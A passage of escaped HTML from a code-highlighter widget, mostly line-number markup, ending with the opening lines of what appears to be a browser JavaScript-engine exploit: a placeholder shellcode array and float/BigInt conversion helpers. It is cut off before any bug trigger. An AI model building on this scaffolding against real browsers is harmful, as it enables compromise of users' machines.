class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-152\">152<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-153\">153<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-154\">154<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-155\">155<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-156\">156<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-157\">157<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-158\">158<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-159\">159<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-160\">160<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-161\">161<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-162\">162<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-163\">163<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-164\">164<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-165\">165<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-166\">166<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-167\">167<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-168\">168<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-169\">169<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-170\">170<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-171\">171<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-172\">172<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-173\">173<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-174\">174<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-175\">175<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-176\">176<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-177\">177<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-178\">178<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-179\">179<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-180\">180<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-181\">181<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-182\">182<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-183\">183<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-184\">184<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-185\">185<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-186\">186<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-187\">187<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-188\">188<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-189\">189<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-190\">190<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-191\">191<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-192\">192<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-193\">193<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-194\">194<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-195\">195<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-196\">196<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-197\">197<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-198\">198<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-199\">199<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-200\">200<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-201\">201<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-202\">202<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-203\">203<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-204\">204<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-205\">205<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-206\">206<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-207\">207<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-208\">208<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-209\">209<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-210\">210<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-211\">211<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-212\">212<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-213\">213<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-214\">214<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-215\">215<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-216\">216<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-217\">217<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-218\">218<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-219\">219<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-220\">220<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-221\">221<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-222\">222<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-223\">223<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-224\">224<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-225\">225<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-226\">226<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-227\">227<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-228\">228<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-229\">229<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-230\">230<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-231\">231<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-232\">232<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-233\">233<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-234\">234<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-235\">235<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-236\">236<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-237\">237<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-238\">238<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-239\">239<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-240\">240<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-241\">241<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-242\">242<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-243\">243<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-244\">244<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-245\">245<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-246\">246<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-247\">247<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-248\">248<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-249\">249<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-250\">250<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-251\">251<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-252\">252<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-253\">253<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-254\">254<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-255\">255<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-256\">256<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-257\">257<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-258\">258<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-259\">259<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-260\">260<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-261\">261<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-262\">262<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-263\">263<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-264\">264<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-265\">265<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-266\">266<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-267\">267<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-268\">268<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-269\">269<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-270\">270<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7875724109470309230-271\">271<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7875724109470309230-272\">272<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">DOCTYPE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-2\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">html<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">console<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">log<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ We need some space later<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x100000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">scratch_u64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scratch<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">scratch_u8<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fill<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xcc<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbe<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">shellcode<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x18<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">uint8View<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ab<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">Number<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">toBigInt<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">BigInt<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">toNumber<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">toNumber<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">uint64View<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">floatView<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;0x&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-38\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">fail<\/span><span 